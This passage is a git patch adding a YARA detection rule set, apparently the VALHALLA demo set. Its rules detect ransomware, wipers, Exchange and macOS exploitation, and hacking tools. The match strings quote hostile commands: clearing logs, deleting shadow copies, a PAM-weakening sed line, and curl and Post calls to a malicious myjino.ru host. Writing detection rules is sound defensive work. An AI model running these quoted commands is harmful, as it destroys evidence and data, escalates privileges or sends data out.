From aa0fee6a04ac07acf74a4580569f6501be1a2257 Mon Sep 17 00:00:00 2001
From: harryeetsource <95581121+harryeetsource@users.noreply.github.com>
Date: Thu, 26 Jan 2023 18:49:56 -0800
Subject: [PATCH] Add files via upload

---
 valhalla-rules.yar | 53229 +++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 53229 insertions(+)
 create mode 100644 valhalla-rules.yar

diff --git a/valhalla-rules.yar b/valhalla-rules.yar
new file mode 100644
index 0000000..34cf12e
--- /dev/null
+++ b/valhalla-rules.yar
@@ -0,0 +1,53229 @@
+/*
+    VALHALLA YARA RULE SET - DEMO
+    Retrieved: 2023-01-27 02:55
+    Generated for User: demo
+    Number of Rules: 2368
+    Warning:
+        Note that the full rule set contains rules that require modules and threat hunting
+        rules with low scores (< 60) that could lead to false positives - use the Python
+        module valhallaAPI to retrieve a filtered set
+
+    This is the VALHALLA demo rule set. The content represents the 'signature-base' repository
+    in a streamlined format but lacks the rules provided by 3rd parties.
+    All rules are licensed under CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/.
+*/
+
+import "math"
+import "pe"
+
+rule EXPL_ManageEngine_CVE_2022_47966_Jan23_1_RID3386 : CVE_2022_47966 DEMO EXPLOIT {
+   meta:
+      description = "Detects indicators of exploitation of ManageEngine vulnerability as described by Horizon3"
+      author = "Florian Roth"
+      reference = "https://www.horizon3.ai/manageengine-cve-2022-47966-iocs/"
+      date = "2023-01-13 14:51:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2022_47966, DEMO, EXPLOIT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $ = "]: com.adventnet.authentication.saml.SamlException: Signature validation failed. SAML Response rejected|" 
+   condition: 
+      1 of them
+}
+
+rule APT_MAL_RANSOM_ViceSociety_PolyVice_Jan23_1_RID361B : APT DEMO EXE MAL RANSOM {
+   meta:
+      description = "Detects NTRU-ChaChaPoly (PolyVice) malware used by Vice Society"
+      author = "Florian Roth"
+      reference = "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/"
+      date = "2023-01-12 16:41:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-13"
+      hash1 = "326a159fc2e7f29ca1a4c9a64d45b76a4a072bc39ba864c49d804229c5f6d796"
+      hash2 = "8c8cb887b081e0d92856fb68a7df0dabf0b26ed8f0a6c8ed22d785e596ce87f4"
+      hash3 = "9d9e949ecd72d7a7c4ae9deae4c035dcae826260ff3b6e8a156240e28d7dbfef"
+      tags = "APT, DEMO, EXE, MAL, RANSOM"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "C:\\Users\\root\\Desktop\\niX\\CB\\libntru\\" ascii
+      $s1 = "C:\\Users\\root" ascii fullword
+      $s2 = "#DBG: target = %s" ascii fullword
+      $s3 = "# ./%s [-p <path>]/[-f <file> ] [-e <enc.extension>] [-m <requirements file name>]" ascii fullword
+      $s4 = "### ################# ###" ascii fullword
+      $op1 = { 89 ca 41 01 fa 89 ef 8b 6c 24 24 44 89 c9 09 d1 44 31 e6 89 c8 } 
+      $op2 = { bd 02 00 00 00 29 cd 48 0f bf d1 8b 44 46 02 01 44 53 02 8d 54 0d 00 83 c1 02 48 0f bf c2 } 
+      $op3 = { 48 29 c4 4c 8d 74 24 30 4c 89 f1 e8 46 3c 00 00 84 c0 41 89 c4 0f 85 2b 02 00 00 0f b7 45 f2 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 2 of them ) or 4 of them
+}
+
+rule APT_MAL_RANSOM_ViceSociety_Chily_Jan23_1_RID34E9 : APT DEMO EXE MAL RANSOM {
+   meta:
+      description = "Detects Chily or SunnyDay malware used by Vice Society"
+      author = "Florian Roth"
+      reference = "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/"
+      date = "2023-01-12 15:50:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4dabb914b8a29506e1eced1d0467c34107767f10fdefa08c40112b2e6fc32e41"
+      tags = "APT, DEMO, EXE, MAL, RANSOM"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = ".[Chily@Dr.Com]" ascii fullword
+      $s1 = "localbitcoins.com/buy_bitcoins'>https://localbitcoins.com/buy_bitcoins</a>" ascii fullword
+      $s2 = "C:\\Users\\root\\Desktop" ascii fullword
+      $s3 = "for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"" wide fullword
+      $s4 = "cd %userprofile%\\documents\\" wide
+      $s5 = "noise.bmp" wide fullword
+      $s6 = " Execution time: %fms (1sec=1000ms)" ascii fullword
+      $s7 = "/c vssadmin.exe Delete Shadows /All /Quiet" wide fullword
+      $op1 = { 4c 89 c5 89 ce 89 0d f5 41 02 00 4c 89 cf 44 8d 04 49 0f af f2 89 15 e9 41 02 00 44 89 c0 } 
+      $op2 = { 48 8b 03 48 89 d9 ff 50 10 84 c0 0f 94 c0 01 c0 48 83 c4 20 5b } 
+      $op3 = { 31 c0 47 8d 2c 00 45 85 f6 4d 63 ed 0f 8e ec 00 00 00 0f 1f 80 00 00 00 00 0f b7 94 44 40 0c 00 00 83 c1 01 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
+}
+
+rule SUSP_ENV_Folder_Root_File_Jan23_1_RID32AE : DEMO SCRIPT SUSP {
+   meta:
+      description = "Detects suspicious file path pointing to the root of a folder easily accessible via environment variables"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2023-01-11 14:15:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, SUSP"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $xr1 = /%([Aa]pp[Dd]ata|APPDATA)%\\[A-Za-z0-9_\-]{1,20}\.[a-zA-Z0-9]{1,4}[^\\]/ wide ascii
+      $xr2 = /%([Pp]ublic|PUBLIC)%\\[A-Za-z0-9_\-]{1,20}\.[a-zA-Z0-9]{1,4}[^\\]/ wide ascii
+      $xr4 = /%([Pp]rogram[Dd]ata|PROGRAMDATA)%\\[A-Za-z0-9_\-]{1,20}\.[a-zA-Z0-9]{1,4}[^\\]/ wide ascii
+      $fp1 = "perl -MCPAN " ascii
+      $fp2 = "CCleaner" ascii
+   condition: 
+      filesize < 20MB and 1 of ( $x* ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
+}
+
+rule HKTL_NATBypass_Dec22_1_RID2E57 : DEMO G0096 HKTL T1090 {
+   meta:
+      description = "Detects NatBypass tool (also used by APT41)"
+      author = "Florian Roth"
+      reference = "https://github.com/cw1997/NATBypass"
+      date = "2022-12-27 11:10:21"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4550635143c9997d5499d1d4a4c860126ee9299311fed0f85df9bb304dca81ff"
+      tags = "DEMO, G0096, HKTL, T1090"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "nb -slave 127.0.0.1:3389 8.8.8.8:1997" ascii
+      $x2 = "| Welcome to use NATBypass Ver" ascii
+      $s1 = "main.port2host.func1" ascii fullword
+      $s2 = "start to transmit address:" ascii
+      $s3 = "^(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])" 
+   condition: 
+      filesize < 8000KB and ( 1 of ( $x* ) or 2 of them ) or 3 of them
+}
+
+rule EXPL_LOG_ProxyNotShell_OWASSRF_PowerShell_Proxy_Log_Dec22_1_RID3C7E : CVE_2022_41040 CVE_2022_41082 DEMO EXPLOIT HKTL LOG SCRIPT T1028 T1059_001 T1086 T1090 {
+   meta:
+      description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
+      author = "Florian Roth"
+      reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
+      date = "2022-12-22 21:14:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2022_41040, CVE_2022_41082, DEMO, EXPLOIT, HKTL, LOG, SCRIPT, T1028, T1059_001, T1086, T1090"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "/owa/mastermailbox%40outlook.com/powershell" ascii wide
+      $sa1 = " 200 " ascii wide
+      $sa2 = " POST " ascii wide
+      $fp1 = "ClientInfo" ascii wide fullword
+      $fp2 = "Microsoft WinRM Client" ascii wide fullword
+      $fp3 = "Exchange BackEnd Probes" ascii wide fullword
+   condition: 
+      all of ( $s* ) and not 1 of ( $fp* )
+}
+
+rule EXPL_LOG_ProxyNotShell_OWASSRF_PowerShell_Proxy_Log_Dec22_2_RID3C7F : CVE_2022_41040 CVE_2022_41082 DEMO EXPLOIT HKTL LOG SCRIPT T1028 T1059_001 T1086 T1090 {
+   meta:
+      description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
+      author = "Florian Roth"
+      reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
+      date = "2022-12-22 21:14:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2022_41040, CVE_2022_41082, DEMO, EXPLOIT, HKTL, LOG, SCRIPT, T1028, T1059_001, T1086, T1090"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $sr1 = / \/owa\/[^\/\s]{1,30}(%40|@)[^\/\s\.]{1,30}\.[^\/\s]{2,3}\/powershell / ascii wide
+      $sa1 = " 200 " ascii wide
+      $sa2 = " POST " ascii wide
+      $fp1 = "ClientInfo" ascii wide fullword
+      $fp2 = "Microsoft WinRM Client" ascii wide fullword
+      $fp3 = "Exchange BackEnd Probes" ascii wide fullword
+   condition: 
+      all of ( $s* ) and not 1 of ( $fp* )
+}
+
+rule EXPL_LOG_ProxyNotShell_OWASSRF_PowerShell_Proxy_Log_Dec22_3_RID3C80 : CVE_2022_41040 CVE_2022_41082 DEMO EXPLOIT HKTL LOG SCRIPT T1028 T1059_001 T1086 T1090 {
+   meta:
+      description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
+      author = "Florian Roth"
+      reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
+      date = "2022-12-22 21:14:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2022_41040, CVE_2022_41082, DEMO, EXPLOIT, HKTL, LOG, SCRIPT, T1028, T1059_001, T1086, T1090"
+      minimum_yara = "1.7"
+      
+   strings:
+      $sa1 = " POST /powershell - 444 " ascii wide
+      $sa2 = " POST /Powershell - 444 " ascii wide
+      $sb1 = " - 200 0 0 2" ascii wide
+      $fp1 = "ClientInfo" ascii wide fullword
+      $fp2 = "Microsoft WinRM Client" ascii wide fullword
+      $fp3 = "Exchange BackEnd Probes" ascii wide fullword
+   condition: 
+      1 of ( $sa* ) and $sb1 and not 1 of ( $fp* )
+}
+
+rule EXPL_LOG_ProxyNotShell_PowerShell_Proxy_Log_Dec22_1_RID39FA : CVE_2022_41040 CVE_2022_41082 DEMO EXPLOIT HKTL LOG SCRIPT T1028 T1059_001 T1086 T1090 {
+   meta:
+      description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
+      author = "Florian Roth"
+      reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
+      date = "2022-12-22 19:26:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2022_41040, CVE_2022_41082, DEMO, EXPLOIT, HKTL, LOG, SCRIPT, T1028, T1059_001, T1086, T1090"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ",/Powershell" ascii wide nocase
+      $s2 = ",Kerberos,true," ascii wide
+      $s3 = ",200,0,,,," ascii wide
+      $sx1 = ";OnEndRequest.End.ContentType=application/soap+xml charset UTF-8;S:ServiceCommonMetadata.HttpMethod=POST;" 
+      $fp1 = "ClientInfo" ascii wide fullword
+      $fp2 = "Microsoft WinRM Client" ascii wide fullword
+      $fp3 = "Exchange BackEnd Probes" ascii wide fullword
+   condition: 
+      all of ( $s* ) and not 1 of ( $fp* )
+}
+
+rule EXPL_HKTL_macOS_Switcharoo_CVE_2022_46689_Dec22_RID3631 : CVE_2022_46689 DEMO EXPLOIT FILE HKTL MACOS T1068 {
+   meta:
+      description = "Detects POCs that exploit privilege escalation vulnerability CVE-2022-46689 on macOS"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2022-12-19 16:45:21"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "64acd79a37b6f8443250dd33e95bd933ee39fc6d4f35ba6a987dae878d017386"
+      hash2 = "6c2ace75000de8a7e8786f28b1b41eed72816991a0961475c6800753bfe9278c"
+      hash3 = "6ce080b236ea3aa3b4c992d12af99445ab800abc709c6abbef852a9f0cf219b6"
+      tags = "CVE_2022_46689, DEMO, EXPLOIT, FILE, HKTL, MACOS, T1068"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "vm_read_overwrite: KERN_SUCCESS:%d KERN_PROTECTION_FAILURE:%d other:%d" ascii fullword
+      $x2 = "Execting: %s (posix_spawn returned: %d)" ascii fullword
+      $x3 = "/usr/bin/sed -e \"s/rootok/permit/g\" /etc" ascii fullword
+      $x4 = "vm_unaligned_copy_switch_race" ascii fullword
+      $s1 = "RO mapping was modified" ascii fullword
+      $s2 = "Ran %d times in %ld seconds with no failure" ascii fullword
+      $opa1 = { 4c 89 ee 31 c9 41 b8 00 40 00 00 6a 01 41 5c 41 54 6a 03 58 } 
+      $opa2 = { e8 ?? 01 00 00 48 8b 05 ?? 0? 00 00 8b 38 48 8b 13 44 8b 4b 14 48 83 ec 08 4c 89 ee 31 c9 } 
+      $opa3 = { 48 89 45 c8 48 8d 43 08 48 89 45 d0 4c 8b 7d c8 4c 8b 6d d0 6a 64 41 5e 80 7b 60 00 } 
+      $opb1 = { 55 48 89 e5 48 83 ec 60 48 8b 05 ?1 06 00 00 48 8b 00 48 89 45 f8 0f 28 05 ?b 07 00 00 48 8d 75 d0 } 
+   condition: 
+      ( filesize < 400KB and 1 of ( $x* ) ) or ( ( uint16 ( 0 ) == 0xfacf or uint16 ( 0 ) == 0xfeca ) and filesize < 400KB and 2 of them )
+}
+
+rule EXPL_macOS_Switcharoo_Indicator_Dec22_RID34C9 : CVE_2022_46689 DEMO EXPLOIT MACOS {
+   meta:
+      description = "Detects indicators found after exploitations of CVE-2022-46689"
+      author = "Florian Roth"
+      reference = "https://github.com/zhuowei/MacDirtyCowDemo"
+      date = "2022-12-19 15:45:21"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2022_46689, DEMO, EXPLOIT, MACOS"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "auth       sufficient     pam_permit.so" ascii
+   condition: 
+      filesize < 1KB and $x1
+}
+
+rule HKTL_Venom_LIB_Dec22_RID2DAD : DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects Venom - a library that meant to perform evasive communication using stolen browser socket"
+      author = "Florian Roth"
+      reference = "https://github.com/Idov31/Venom"
+      date = "2022-12-17 10:42:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[ + ] Created detached hidden msedge process: " fullword ascii
+      $ss1 = "WS2_32.dll" fullword ascii
+      $ss2 = "WSASocketW" fullword ascii
+      $ss3 = "WSADuplicateSocketW" fullword ascii
+      $ss5 = "\\Device\\Afd" wide fullword
+      $sx1 = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe --no-startup-window" fullword wide
+      $sx2 = "[ + ] Data sent!" fullword ascii
+      $sx3 = "[ + ] Socket obtained!" fullword ascii
+      $op1 = { 4c 8b f0 48 3b c1 48 b8 ff ff ff ff ff ff ff 7f } 
+      $op2 = { 48 8b cf e8 1c 34 00 00 48 8b 5c 24 30 48 8b c7 } 
+      $op3 = { 48 8b da 48 8b f9 45 33 f6 48 85 c9 0f 84 34 01 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and ( ( 3 of ( $ss* ) and all of ( $op* ) ) or 2 of ( $sx* ) ) or $x1 or all of ( $sx* )
+}
+
+rule APT_CryWiper_Dec22_RID2D59 : APT DEMO MAL T1050 {
+   meta:
+      description = "Detects CryWiper malware samples"
+      author = "Florian Roth"
+      reference = "https://securelist-ru.translate.goog/novyj-troyanec-crywiper/106114/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en"
+      date = "2022-12-05 10:28:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, MAL, T1050"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Software\\Sysinternals\\BrowserUpdate" 
+      $sx1 = "taskkill.exe /f /im MSExchange*" 
+      $s1 = "SYSTEM\\CurrentControlSet\\Control\\Terminal Server" ascii
+      $s2 = "fDenyTSConnections" ascii
+   condition: 
+      1 of ( $x* ) or all of ( $s* )
+}
+
+rule MAL_RANSOM_Venus_Nov22_1_RID2F10 : CRIME DEMO EXE MAL RANSOM {
+   meta:
+      description = "Detects Venus Ransomware samples"
+      author = "Florian Roth"
+      reference = "https://twitter.com/dyngnosis/status/1592588860168421376"
+      date = "2022-11-16 11:41:11"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "46f9cbc3795d6be0edd49a2c43efe6e610b82741755c5076a89eeccaf98ee834"
+      hash2 = "6d8e2d8f6aeb0f4512a53fe83b2ef7699513ebaff31735675f46d1beea3a8e05"
+      hash3 = "931cab7fbc0eb2bbc5768f8abdcc029cef76aff98540d9f5214786dccdb6a224"
+      tags = "CRIME, DEMO, EXE, MAL, RANSOM"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "<html><head><title>Venus</title><style type = \"text" ascii fullword
+      $x2 = "xXBLTZKmAu9pjcfxrIK4gkDp/J9XXATjuysFRXG4rH4=" ascii fullword
+      $x3 = "%s%x%x%x%x.goodgame" wide fullword
+      $s1 = "/c ping localhost -n 3 > nul & del %s" ascii fullword
+      $s2 = "C:\\Windows\\%s.png" wide
+      $op1 = { 8b 4c 24 24 46 8b 7c 24 14 41 8b 44 24 30 81 c7 00 04 00 00 81 44 24 10 00 04 00 00 40 } 
+      $op2 = { 57 c7 45 fc 00 00 00 00 7e 3f 50 33 c0 74 03 9b 6e } 
+      $op3 = { 66 89 45 d4 0f 11 45 e8 e8 a8 e7 ff ff 83 c4 14 8d 45 e8 50 8d 45 a4 50 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 700KB and ( pe.imphash ( ) == "bb2600e94092da119ee6acbbd047be43" or 1 of ( $x* ) or 2 of them ) or 4 of them
+}
+
+rule HKTL_BruteRatel_Badger_Indicators_Oct22_4_RID362C : DEMO FILE HKTL {
+   meta:
+      description = "Detects Brute Ratel C4 badger indicators"
+      author = "Florian Roth"
+      reference = "https://twitter.com/embee_research/status/1580030310778953728"
+      date = "2022-10-12 16:44:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = { b? 89 4d 39 8c } 
+      $s2 = { b? bd ca 3b d3 } 
+      $s3 = { b? b2 c1 06 ae } 
+      $s4 = { b? 74 eb 1d 4d } 
+   condition: 
+      filesize < 8000KB and all of ( $s* ) and not uint8 ( 0 ) == 0x02
+}
+
+rule EXPL_Exchange_ProxyNotShell_Patterns_CVE_2022_41040_Oct22_1_RID3B59 : CVE_2022_41040 DEMO EXPLOIT SCRIPT {
+   meta:
+      description = "Detects successful ProxyNotShell exploitation attempts in log files (attempt to identify the attack before the official release of detailed information)"
+      author = "Florian Roth"
+      reference = "https://github.com/kljunowsky/CVE-2022-41040-POC"
+      date = "2022-10-11 20:25:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2022_41040, DEMO, EXPLOIT, SCRIPT"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $sr1 = / \/autodiscover\/autodiscover\.json[^\n]{1,300}owershell/ nocase ascii
+      $sa1 = " 200 " 
+      $sa2 = " 401 " 
+      $fp1 = " 444 " 
+      $fp2 = " 404 " 
+      $fp3 = "GET /owa/ &Email=autodiscover/autodiscover.json%3F@test.com&ClientId=" ascii
+      $fp4 = "@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" ascii
+   condition: 
+      $sr1 and 1 of ( $sa* ) and not 1 of ( $fp* )
+}
+
+rule MAL_QBot_HTML_Smuggling_Indicators_Oct22_1_RID3648 : DEMO MAL {
+   meta:
+      description = "Detects double encoded PKZIP headers as seen in HTML files used by QBot"
+      author = "Florian Roth"
+      reference = "https://twitter.com/ankit_anubhav/status/1578257383133876225?s=20&t=Bu3CCJCzImpTGOQX_KGsdA"
+      date = "2022-10-07 16:49:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4f384bcba31fda53e504d0a6c85cee0ce3ea9586226633d063f34c53ddeaca3f"
+      hash2 = "8e61c2b751682becb4c0337f5a79b2da0f5f19c128b162ec8058104b894cae9b"
+      hash3 = "c5d23d991ce3fbcf73b177bc6136d26a501ded318ccf409ca16f7c664727755a"
+      tags = "DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $sd1 = "VUVzREJCUUFBUUFJQ" 
+      $sd2 = "VFc0RCQlFBQVFBSU" 
+      $sd3 = "VRXNEQkJRQUFRQUlB" 
+      $sdr1 = "QJFUUBFUUCJERzVUV" 
+      $sdr2 = "USBFVQBFlQCR0cFV" 
+      $sdr3 = "BlUQRFUQRJkQENXRV" 
+      $st1 = "VlVWelJFSkNVVUZCVVVGSl" 
+      $st2 = "ZVVnpSRUpDVVVGQlVVRkpR" 
+      $st3 = "WVVZ6UkVKQ1VVRkJVVUZKU" 
+      $st4 = "VkZjMFJDUWxGQlFWRkJTV" 
+      $st5 = "ZGYzBSQ1FsRkJRVkZCU1" 
+      $st6 = "WRmMwUkNRbEZCUVZGQlNV" 
+      $st7 = "VlJYTkVRa0pSUVVGUlFVbE" 
+      $st8 = "ZSWE5FUWtKUlFVRlJRVWxC" 
+      $st9 = "WUlhORVFrSlJRVUZSUVVsQ" 
+      $str1 = "UUpGVVVCRlVVQ0pFUnpWVV" 
+      $str2 = "FKRlVVQkZVVUNKRVJ6VlVW" 
+      $str3 = "RSkZVVUJGVVVDSkVSelZVV" 
+      $str4 = "VVNCRlZRQkZsUUNSMGNGV" 
+      $str5 = "VTQkZWUUJGbFFDUjBjRl" 
+      $str6 = "VU0JGVlFCRmxRQ1IwY0ZW" 
+      $str7 = "QmxVUVJGVVFSSmtRRU5YUl" 
+      $str8 = "JsVVFSRlVRUkprUUVOWFJW" 
+      $str9 = "CbFVRUkZVUVJKa1FFTlhSV" 
+      $htm = "<html" ascii
+      $eml = "Content-Transfer-Encoding:" ascii
+   condition: 
+      filesize < 10MB and ( ( 1 of ( $sd* ) and $htm and not $eml ) or ( 1 of ( $st* ) and $eml ) )
+}
+
+rule SUSP_MAL_EXFIL_Stealer_Output_Characteristics_Sep22_1_RID3A81 : DEMO FILE MAL SUSP T1020 {
+   meta:
+      description = "Detects typical stealer output files as created by RedLine or Racoon stealer"
+      author = "Florian Roth"
+      reference = "https://twitter.com/cglyer/status/1570965878480719873"
+      date = "2022-09-17 19:49:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8ce14c6b720281f43c75ce52e23ec13d08e7b2be1c5fbc2d704238f1fdd1a07f"
+      hash2 = "011c19d18fa446a2619b3a2512dacb2694e1da99a2c2ea7828769f1373ecd8fe"
+      hash3 = "418530bc7210f74ada8e7f16b41ea2033054e99f0c4423ce1d3ebf973c89e3a3"
+      tags = "DEMO, FILE, MAL, SUSP, T1020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $sa1 = "passwords.txt" ascii
+      $sa2 = "autofills/" ascii
+      $sa3 = "browsers/cookies/" ascii
+      $sa4 = "wallets/" ascii
+      $sb1 = "Passwords.txt" ascii
+      $sb2 = "Autofills/" ascii
+      $sb3 = "Browsers/Cookies/" ascii
+      $sb4 = "Wallets/" ascii
+   condition: 
+      uint16 ( 0 ) == 0x4b50 and filesize < 5000KB and ( 2 of ( $sa* ) or 2 of ( $sb* ) )
+}
+
+rule HKTL_PUA_NET_AdCollector_Sep22_1_RID31F5 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects ADCollector Tool - a lightweight tool to quickly extract valuable information from the Active Directory environment for both attacking and defending"
+      author = "Florian Roth"
+      reference = "https://github.com/dev-2null/ADCollector"
+      date = "2022-09-15 13:44:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "241390219a0a773463601ca68b77af97453c20af00a66492a7a78c04d481d338"
+      hash2 = "cc086eb7316e68661e3d547b414890d5029c5cc460134d8b628f4b0be7f27fb3"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "ADCollector.exe --SPNs --Term key --Acls 'CN=Domain Admins,CN=Users,DC=lab,DC=local'" wide fullword
+      $s1 = "ADCollector.exe" wide fullword
+      $s2 = "ENCRYPTED_TEXT_PASSWORD_ALLOWED" ascii fullword
+      $s3 = "\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf" wide
+      $s4 = "[-] Password Does Not Expire Accounts:" wide
+      $s5 = "  * runAs:       {0}" wide fullword
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and ( 1 of ( $x* ) or 3 of them )
+}
+
+rule MAL_Github_Repo_Compromise_MyJino_Ru_Aug22_RID36DA : DEMO MAL RUSSIA {
+   meta:
+      description = "Detects URL mentioned in report on compromised Github repositories in August 2022"
+      author = "Florian Roth"
+      reference = "https://twitter.com/stephenlacy/status/1554697077430505473"
+      date = "2022-08-03 17:13:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "curl http://ovz1.j19544519.pr46m.vps.myjino.ru" ascii wide
+      $x2 = "http__.Post(\"http://ovz1.j19544519.pr46m.vps.myjino.ru" ascii wide
+   condition: 
+      1 of them
+}
+
+rule VULN_PUA_GIGABYTE_Driver_Jul22_1_RID318F : DEMO MAL VULN {
+   meta:
+      description = "Detects a vulnerable GIGABYTE driver sometimes used by malicious actors to escalate privileges"
+      author = "Florian Roth"
+      reference = "https://twitter.com/malmoeb/status/1551449425842786306"
+      date = "2022-07-25 13:27:41"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427"
+      tags = "DEMO, MAL, VULN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $xc1 = { 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73
+               00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 32
+               00 2E 00 33 00 37 00 39 00 30 00 2E 00 31 00 38
+               00 33 00 30 00 20 00 62 00 75 00 69 00 6C 00 74
+               00 20 00 62 00 79 00 3A 00 20 00 57 00 69 00 6E
+               00 44 00 44 00 4B 00 00 00 00 00 32 00 09 00 01
+               00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C
+               00 4E 00 61 00 6D 00 65 00 00 00 67 00 64 00 72
+               00 76 00 2E 00 73 00 79 00 73 } 
+      $x1 = "AEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAANQAuADIALgAzADcAOQAwAC4AMQA4ADMAMAAgAGIAdQBpAGwAdAAgAGIAeQA6ACAAVwBpAG4ARABEAEsAAAAAADIACQABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAZwBkAHIAdgAuAHMAeQBz" 
